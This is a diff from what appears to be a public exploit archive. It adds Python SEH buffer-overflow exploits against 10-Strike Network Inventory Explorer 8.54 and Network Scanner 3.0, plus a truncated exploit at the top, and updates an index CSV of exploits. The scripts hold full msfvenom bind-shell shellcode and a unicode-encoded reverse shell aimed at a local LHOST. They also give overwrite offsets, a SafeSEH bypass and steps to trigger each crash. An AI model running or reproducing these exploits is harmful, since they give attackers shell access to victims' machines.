< calc.raw + +#seh-"004d00b3" +#\x73-venetian pad(other things didn't work) +#248 bytes of padding before shellcode is required which is 124 bytes in Unicode +#EAX register is used for operation + +seh= "\x41\x73" + "\xb3\x4d" +operation="\x73\x53\x73\x58\x73\x05\x0b\x01\x73\x2d\x02\x01\x73\x50\x73\xc3" + "\x90"*124 + +shellcode=("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK83YKPKPKPS0TIYUNQ8RC4TKPRP0TK0RLL4KPRLT4KRRNHLOWGPJMVNQKO01GP6LOLQQCLM2NLMPWQXOLMKQ97IRL0PR0W4K22LP4KOROLKQ8P4KOP2XU5WP2TPJKQXPPPDKPHMHTK28MPKQXSK3OLOYTKP4TKKQXVNQKONQWP6LY1XOLMKQWW08K0RUL4M3SMZXOK3MNDBUIRQH4KB8MTKQXSBFDKLLPKTK0XMLM1IC4KKTDKM1HPSY14MTNDQKQKQQ0YPZR1KOIPQHQO1J4KLRJKE6QMRJKQTMU5VYKPM0M0PPS801TKROTGKOJ57KJP7EUR1FQXW6TUGM5MKOXUOLLFSLLJSPKK9P2UM57KOWN3T2BOBJKP1CKO8UQSC1RL2CKPA") + +#msfpayload windows/shell_reverse_tcp LHOST=172.20.10.3 LPORT=4444 R > reverse.raw +#./alpha2 eax --unicode --uppercase < reverse.raw +reverse=("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKL9X3YM0KPKPQPTIYUNQYBQTDKR2NPTKPRLL4KQBMDTKBRMXLOVWOZMVP1KONQWP6LOLQQSLKRNLMPWQXOLMM1Y7YRL022B7TKPRLPDKOROLKQHPDKOP2XCUY044OZKQJ00PTKOXN84KPXMPKQ9CK3OLQ9TKNT4KKQZ6P1KONQ7P6LWQHOLMKQ97OHIPBUJTM3SMKHOK3MNDRUK2R84KQHNDKQZ3S64KLL0KTKR8MLKQICTKM44KKQHPDIOTO4O4QKQK1Q0YPZPQKOK0QH1O1JTKLRZKDF1MS8NSNRKPKP1XT7BSNR1O0TQXPLCGMVKWKO8UFX4PKQKPKPMY940TPPBHO9502KKPKO9EPP0P20PPOPR0OP0P1XJJLO9O9PKO8UTIXGRH6LN4LJLCQXLBM0LQQLDI9VQZLPPVPW1XTYEUT4QQKOJ5BHQSBMQTM0U9JCR7270WP1JV1ZMBPYR6YRKM1VY7PDNDOLKQM1TMOTO4LPGVKPQ4PTPPB6PVPVOVB60NPVPV0SPVRH2Y8LOO3VKO9ESYK00NR6OVKO00S8LHDGMMQPKOXUGKJPVUVBPVRH76TUWMUMKOJ5OLKVSLLJ3PKKYPT5KUWKOWMCRRRO1ZKPPSKOZ5A") + +buf="A"*828 + seh + operation + shellcode + "D"*(4164-len(operation) -len(shellcode)) + +f=open("evil.txt","w") +f.write(buf) +f.close() \ No newline at end of file diff --git a/exploits/windows_x86/local/44838.py b/exploits/windows_x86/local/44838.py new file mode 100755 index 000000000..8e5005e30 --- /dev/null +++ b/exploits/windows_x86/local/44838.py @@ -0,0 +1,75 @@ +# Exploit Title : 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH) +# Exploit Author : Hashim Jawad - ihack4falafel +# Vendor Homepage : https://www.10-strike.com/ +# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe +# Tested on : Windows 7 Enterprise - SP1 (x86) +# Disclosure Timeline: +# 06-02-18: Contacted vendor, no response +# 06-03-18: Contacted vendor, no response +# 06-04-18: Contacted vendor, no response +# 06-05-18: Proof of concept exploit published + +# Steps to reproduce: +# - Under Computers tab click on 'From Text File' +# - Open Evil.txt and boom! +# Notes: +# - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll] +# - Next SEH offset is 211 bytes but for some reason passing the exception to the program will result in shifting +# the stack by 8 bytes, see buffer for reference. +# - Keep in mind the exploit is contingent on path, and as such you need to make sure offsets stay intact based on +# your username, the following is the path used while developing the exploit (default on Windows 7): +# [C:\Users\IEUser\AppData\Roaming\10-strike\Network Inventory\cfg\] +# - Pro edition is effected as well. + +#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d\x3a\x5c' -f python -v shellcode +#Payload size: 355 bytes + +#!/usr/bin/python + +shellcode = "" +shellcode += "\xba\x58\x39\xb1\xae\xd9\xcf\xd9\x74\x24\xf4\x5f" +shellcode += "\x29\xc9\xb1\x53\x83\xef\xfc\x31\x57\x0e\x03\x0f" +shellcode += "\x37\x53\x5b\x53\xaf\x11\xa4\xab\x30\x76\x2c\x4e" +shellcode += "\x01\xb6\x4a\x1b\x32\x06\x18\x49\xbf\xed\x4c\x79" +shellcode += "\x34\x83\x58\x8e\xfd\x2e\xbf\xa1\xfe\x03\x83\xa0" +shellcode += "\x7c\x5e\xd0\x02\xbc\x91\x25\x43\xf9\xcc\xc4\x11" +shellcode += "\x52\x9a\x7b\x85\xd7\xd6\x47\x2e\xab\xf7\xcf\xd3" +shellcode += "\x7c\xf9\xfe\x42\xf6\xa0\x20\x65\xdb\xd8\x68\x7d" +shellcode += "\x38\xe4\x23\xf6\x8a\x92\xb5\xde\xc2\x5b\x19\x1f" +shellcode += "\xeb\xa9\x63\x58\xcc\x51\x16\x90\x2e\xef\x21\x67" +shellcode += "\x4c\x2b\xa7\x73\xf6\xb8\x1f\x5f\x06\x6c\xf9\x14" +shellcode += "\x04\xd9\x8d\x72\x09\xdc\x42\x09\x35\x55\x65\xdd" +shellcode += "\xbf\x2d\x42\xf9\xe4\xf6\xeb\x58\x41\x58\x13\xba" +shellcode += "\x2a\x05\xb1\xb1\xc7\x52\xc8\x98\x8f\x97\xe1\x22" +shellcode += "\x50\xb0\x72\x51\x62\x1f\x29\xfd\xce\xe8\xf7\xfa" +shellcode += "\x31\xc3\x40\x94\xcf\xec\xb0\xbd\x0b\xb8\xe0\xd5" +shellcode += "\xba\xc1\x6a\x25\x42\x14\x06\x2d\xe5\xc7\x35\xd0" +shellcode += "\x55\xb8\xf9\x7a\x3e\xd2\xf5\xa5\x5e\xdd\xdf\xce" +shellcode += "\xf7\x20\xe0\xe1\x5b\xac\x06\x6b\x74\xf8\x91\x03" +shellcode += "\xb6\xdf\x29\xb4\xc9\x35\x02\x52\x81\x5f\x95\x5d" +shellcode += "\x12\x4a\xb1\xc9\x99\x99\x05\xe8\x9d\xb7\x2d\x7d" +shellcode += "\x09\x4d\xbc\xcc\xab\x52\x95\xa6\x48\xc0\x72\x36" +shellcode += "\x06\xf9\x2c\x61\x4f\xcf\x24\xe7\x7d\x76\x9f\x15" +shellcode += "\x7c\xee\xd8\x9d\x5b\xd3\xe7\x1c\x29\x6f\xcc\x0e" +shellcode += "\xf7\x70\x48\x7a\xa7\x26\x06\xd4\x01\x91\xe8\x8e" +shellcode += "\xdb\x4e\xa3\x46\x9d\xbc\x74\x10\xa2\xe8\x02\xfc" +shellcode += "\x13\x45\x53\x03\x9b\x01\x53\x7c\xc1\xb1\x9c\x57" +shellcode += "\x41\xc1\xd6\xf5\xe0\x4a\xbf\x6c\xb1\x16\x40\x5b" +shellcode += "\xf6\x2e\xc3\x69\x87\xd4\xdb\x18\x82\x91\x5b\xf1" +shellcode += "\xfe\x8a\x09\xf5\xad\xab\x1b" + +buffer = '\x41' * 207 filler to nSEH offset (211-4) +buffer += '\x9f\x4e\xe9\x61' 0x61E94E9F [sqlite3.dll] | jmp esp +buffer += '\x90\x90\x90\x90' nSEH +buffer += '\x90\x90\x90\x90' SEH +buffer += shellcode bind shell +buffer += '\xcc' * (3000-207-12-len(shellcode)) junk + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except Exception as e: + print e \ No newline at end of file diff --git a/exploits/windows_x86/local/44840.py b/exploits/windows_x86/local/44840.py new file mode 100755 index 000000000..cbea523c3 --- /dev/null +++ b/exploits/windows_x86/local/44840.py @@ -0,0 +1,71 @@ +# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH) +# Exploit Author: Hashim Jawad - ihack4falafelx +# Date: 2018-06-05 +# Vendor Homepage: https://www.10-strike.com/ +# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe +# Tested on: Windows 7 Enterprise - SP1 (x86) +# Disclosure Timeline: +# 06-02-18: Contacted vendor, no response +# 06-03-18: Contacted vendor, no response +# 06-04-18: Contacted vendor, no response +# 06-05-18: Proof of concept exploit published + +# Steps to reproduce: +# - Under Help, click 'Enter Registration Key'. +# - Paste the contents of Evil.txt and click OK. +# Notes: +# - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll] +# - There is ample space prior to SEH overwrite. +# - Pro edition is effected as well. +# - root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -f python -v shellcode +# - Payload size: 355 bytes + +#!/usr/bin/python + +shellcode = "" +shellcode += "\xbf\xad\xa8\x1e\x44\xdd\xc0\xd9\x74\x24\xf4\x5e" +shellcode += "\x2b\xc9\xb1\x53\x83\xc6\x04\x31\x7e\x0e\x03\xd3" +shellcode += "\xa6\xfc\xb1\xd7\x5f\x82\x3a\x27\xa0\xe3\xb3\xc2" +shellcode += "\x91\x23\xa7\x87\x82\x93\xa3\xc5\x2e\x5f\xe1\xfd" +shellcode += "\xa5\x2d\x2e\xf2\x0e\x9b\x08\x3d\x8e\xb0\x69\x5c" +shellcode += "\x0c\xcb\xbd\xbe\x2d\x04\xb0\xbf\x6a\x79\x39\xed" +shellcode += "\x23\xf5\xec\x01\x47\x43\x2d\xaa\x1b\x45\x35\x4f" +shellcode += "\xeb\x64\x14\xde\x67\x3f\xb6\xe1\xa4\x4b\xff\xf9" +shellcode += "\xa9\x76\x49\x72\x19\x0c\x48\x52\x53\xed\xe7\x9b" +shellcode += "\x5b\x1c\xf9\xdc\x5c\xff\x8c\x14\x9f\x82\x96\xe3" +shellcode += "\xdd\x58\x12\xf7\x46\x2a\x84\xd3\x77\xff\x53\x90" +shellcode += "\x74\xb4\x10\xfe\x98\x4b\xf4\x75\xa4\xc0\xfb\x59" +shellcode += "\x2c\x92\xdf\x7d\x74\x40\x41\x24\xd0\x27\x7e\x36" +shellcode += "\xbb\x98\xda\x3d\x56\xcc\x56\x1c\x3f\x21\x5b\x9e" +shellcode += "\xbf\x2d\xec\xed\x8d\xf2\x46\x79\xbe\x7b\x41\x7e" +shellcode += "\xc1\x51\x35\x10\x3c\x5a\x46\x39\xfb\x0e\x16\x51" +shellcode += "\x2a\x2f\xfd\xa1\xd3\xfa\x68\xa9\x72\x55\x8f\x54" +shellcode += "\xc4\x05\x0f\xf6\xad\x4f\x80\x29\xcd\x6f\x4a\x42" +shellcode += "\x66\x92\x75\x7d\x2b\x1b\x93\x17\xc3\x4d\x0b\x8f" +shellcode += "\x21\xaa\x84\x28\x59\x98\xbc\xde\x12\xca\x7b\xe1" +shellcode += "\xa2\xd8\x2b\x75\x29\x0f\xe8\x64\x2e\x1a\x58\xf1" +shellcode += "\xb9\xd0\x09\xb0\x58\xe4\x03\x22\xf8\x77\xc8\xb2" +shellcode += "\x77\x64\x47\xe5\xd0\x5a\x9e\x63\xcd\xc5\x08\x91" +shellcode += "\x0c\x93\x73\x11\xcb\x60\x7d\x98\x9e\xdd\x59\x8a" +shellcode += "\x66\xdd\xe5\xfe\x36\x88\xb3\xa8\xf0\x62\x72\x02" +shellcode += "\xab\xd9\xdc\xc2\x2a\x12\xdf\x94\x32\x7f\xa9\x78" +shellcode += "\x82\xd6\xec\x87\x2b\xbf\xf8\xf0\x51\x5f\x06\x2b" +shellcode += "\xd2\x6f\x4d\x71\x73\xf8\x08\xe0\xc1\x65\xab\xdf" +shellcode += "\x06\x90\x28\xd5\xf6\x67\x30\x9c\xf3\x2c\xf6\x4d" +shellcode += "\x8e\x3d\x93\x71\x3d\x3d\xb6" + +buffer = '\x41' * 4188 # filler to nSEH +buffer += '\x75\x06\x74\x06' # nSEH | jump net +buffer += '\x7a\x49\xe8\x61' # SEH | 0x61e8497a : pop esi # pop edi # ret | [sqlite3.dll] +buffer += '\x90' * 8 # nops +buffer += shellcode # bind shell +buffer += '\x41' * (5000-4188-16-len(shellcode)) # junk + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except Exception as e: + print e \ No newline at end of file diff --git a/exploits/windows_x86/local/44841.py b/exploits/windows_x86/local/44841.py new file mode 100755 index 000000000..0b7a538f1 --- /dev/null +++ b/exploits/windows_x86/local/44841.py @@ -0,0 +1,85 @@ +# Exploit Title: 10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH) +# Exploit Author: Hashim Jawad - ihack4falafel +# Date: 2018-06-05 +# Vendor Homepage: https://www.10-strike.com/ +# Vulnerable Software: https://www.10-strike.com/network-scanner/network-scanner.exe +# Tested on: Windows XP Professional - SP3 (x86) +# Disclosure Timeline: +# 06-02-18: Contacted vendor, no response +# 06-03-18: Contacted vendor, no response +# 06-04-18: Contacted vendor, no response +# 06-05-18: Proof of concept exploit published + +# Steps to reproduce: +# - Copy contents of Evil.txt and paste in 'Host name or address' field under Add host. +# - Right-click on newly created host and click 'Trace route...'. +# - Repeat the second step and boom. +# Notes: +# - '\x00' get converted to '\x20' by the program eliminating the possibility of using [pop, pop, retn] pointers in base binary. +# - All loaded modules are compiled with /SafeSEH. +# - Right-click on newly created host and click 'System information>General' is effected by the same vulnerability with different +# offsets and buffer size. +# - root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -v shellcode -f python +# - Payload size: 355 bytes + +#!/usr/bin/python + +shellcode = "" +shellcode += "\xb8\x2b\x29\xa7\x48\xd9\xe8\xd9\x74\x24\xf4\x5b" +shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\xc0" +shellcode += "\xd5\x45\xbd\xea\xce\x08\x3e\x12\x0f\x6d\xb6\xf7" +shellcode += "\x3e\xad\xac\x7c\x10\x1d\xa6\xd0\x9d\xd6\xea\xc0" +shellcode += "\x16\x9a\x22\xe7\x9f\x11\x15\xc6\x20\x09\x65\x49" +shellcode += "\xa3\x50\xba\xa9\x9a\x9a\xcf\xa8\xdb\xc7\x22\xf8" +shellcode += "\xb4\x8c\x91\xec\xb1\xd9\x29\x87\x8a\xcc\x29\x74" +shellcode += "\x5a\xee\x18\x2b\xd0\xa9\xba\xca\x35\xc2\xf2\xd4" +shellcode += "\x5a\xef\x4d\x6f\xa8\x9b\x4f\xb9\xe0\x64\xe3\x84" +shellcode += "\xcc\x96\xfd\xc1\xeb\x48\x88\x3b\x08\xf4\x8b\xf8" +shellcode += "\x72\x22\x19\x1a\xd4\xa1\xb9\xc6\xe4\x66\x5f\x8d" +shellcode += "\xeb\xc3\x2b\xc9\xef\xd2\xf8\x62\x0b\x5e\xff\xa4" +shellcode += "\x9d\x24\x24\x60\xc5\xff\x45\x31\xa3\xae\x7a\x21" +shellcode += "\x0c\x0e\xdf\x2a\xa1\x5b\x52\x71\xae\xa8\x5f\x89" +shellcode += "\x2e\xa7\xe8\xfa\x1c\x68\x43\x94\x2c\xe1\x4d\x63" +shellcode += "\x52\xd8\x2a\xfb\xad\xe3\x4a\xd2\x69\xb7\x1a\x4c" +shellcode += "\x5b\xb8\xf0\x8c\x64\x6d\x6c\x84\xc3\xde\x93\x69" +shellcode += "\xb3\x8e\x13\xc1\x5c\xc5\x9b\x3e\x7c\xe6\x71\x57" +shellcode += "\x15\x1b\x7a\x46\xba\x92\x9c\x02\x52\xf3\x37\xba" +shellcode += "\x90\x20\x80\x5d\xea\x02\xb8\xc9\xa3\x44\x7f\xf6" +shellcode += "\x33\x43\xd7\x60\xb8\x80\xe3\x91\xbf\x8c\x43\xc6" +shellcode += "\x28\x5a\x02\xa5\xc9\x5b\x0f\x5d\x69\xc9\xd4\x9d" +shellcode += "\xe4\xf2\x42\xca\xa1\xc5\x9a\x9e\x5f\x7f\x35\xbc" +shellcode += "\x9d\x19\x7e\x04\x7a\xda\x81\x85\x0f\x66\xa6\x95" +shellcode += "\xc9\x67\xe2\xc1\x85\x31\xbc\xbf\x63\xe8\x0e\x69" +shellcode += "\x3a\x47\xd9\xfd\xbb\xab\xda\x7b\xc4\xe1\xac\x63" +shellcode += "\x75\x5c\xe9\x9c\xba\x08\xfd\xe5\xa6\xa8\x02\x3c" +shellcode += "\x63\xd8\x48\x1c\xc2\x71\x15\xf5\x56\x1c\xa6\x20" +shellcode += "\x94\x19\x25\xc0\x65\xde\x35\xa1\x60\x9a\xf1\x5a" +shellcode += "\x19\xb3\x97\x5c\x8e\xb4\xbd" + +magic = '\xd9\xee' # fldz +magic += '\xd9\x74\x24\xf4' # fnstenv [esp-0xc] +magic += '\x59' # pop ecx +magic += '\x80\xc1\x05' # add cl,0x5 +magic += '\x80\xc1\x05' # add cl,0x5 +magic += '\x90' # nop +magic += '\xfe\xcd' # dec ch +magic += '\xfe\xcd' # dec ch +magic += '\xff\xe1' # jmp ecx + +buffer = '\x90' * 28 # nops +buffer += shellcode # bind shell +buffer += '\xcc' * (516-28-len(shellcode)) # filler to nSEH +buffer += '\x75\x06\x74\x06' # nSEH | jump net +buffer += '\x18\x05\xfc\x7f' # SEH | 0x7ffc0518 : pop edi # pop edi # ret [SafeSEH Bypass] +buffer += '\x90' * 5 # nops +buffer += magic # jump -512 +buffer += '\xcc' * (3000-516-4-4-5-len(magic)) # junk + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except Exception as e: + print e \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 501b93d3d..f1e03f75a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5986,6 +5986,7 @@ id,file,description,date,author,type,platform,port 44802,exploits/linux/dos/44802.py,"Siemens SIMATIC S7-300 CPU - Remote Denial of Service",2018-05-30,t4rkd3vilz,dos,linux, 44817,exploits/windows/dos/44817.js,"Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion",2018-05-31,"Google Security Research",dos,windows, 44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple, +44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9756,7 +9757,12 @@ id,file,description,date,author,type,platform,port 44819,exploits/hardware/local/44819.js,"Sony Playstation 4 (PS4) 5.1 - Kernel (PoC)",2018-05-28,qwertyoruiop,local,hardware, 44820,exploits/hardware/local/44820.txt,"Sony Playstation 3 (PS3) 4.82 - 'Jailbreak' (ROP)",2018-01-28,PS3Xploit,local,hardware, 44828,exploits/windows/local/44828.py,"Zip-n-Go 4.9 - Buffer Overflow (SEH)",2018-06-04,"Hashim Jawad",local,windows, -44830,exploits/windows/local/44830.rb,"Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)",2018-06-04,Metasploit,local,windows, +44830,exploits/windows/local/44830.rb,"Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)",2018-06-04,Metasploit,local,windows, +44834,exploits/windows/local/44834.py,"Clone2GO Video converter 2.8.2 - Buffer Overflow",2018-06-05,"Gokul Babu",local,windows, +44838,exploits/windows_x86/local/44838.py,"10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86, +44840,exploits/windows_x86/local/44840.py,"10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86, +44841,exploits/windows_x86/local/44841.py,"10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86, +44842,exploits/linux/local/44842.txt,"WebKitGTK+ < 2.21.3 - Crash (PoC)",2018-06-05,"Dhiraj Mishra",local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16543,6 +16549,7 @@ id,file,description,date,author,type,platform,port 44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64, 44822,exploits/linux/remote/44822.txt,"Git < 2.17.1 - Remote Code Execution",2018-06-01,JameelNabbo,remote,linux, 44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux, +44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39495,4 +39502,8 @@ id,file,description,date,author,type,platform,port 44825,exploits/php/webapps/44825.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution",2018-06-03,xichao,webapps,php, 44826,exploits/php/webapps/44826.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin)",2018-06-03,xichao,webapps,php, 44827,exploits/java/webapps/44827.txt,"SearchBlox 8.6.7 - XML External Entity Injection",2018-06-04,"Ahmet Gurel",webapps,java, -44831,exploits/aspx/webapps/44831.txt,"EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting",2018-06-04,"Chris Barretto",webapps,aspx, +44831,exploits/aspx/webapps/44831.txt,"EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting",2018-06-04,"Chris Barretto",webapps,aspx, +44833,exploits/php/webapps/44833.txt,"MyBB Recent Threads Plugin 1.0 - Cross-Site Scripting",2018-06-05,0xB9,webapps,php, +44837,exploits/php/webapps/44837.py,"Pagekit < 1.0.13 - Cross-Site Scripting Code Generator",2018-06-05,DEEPIN2,webapps,php, +44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware, +44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux,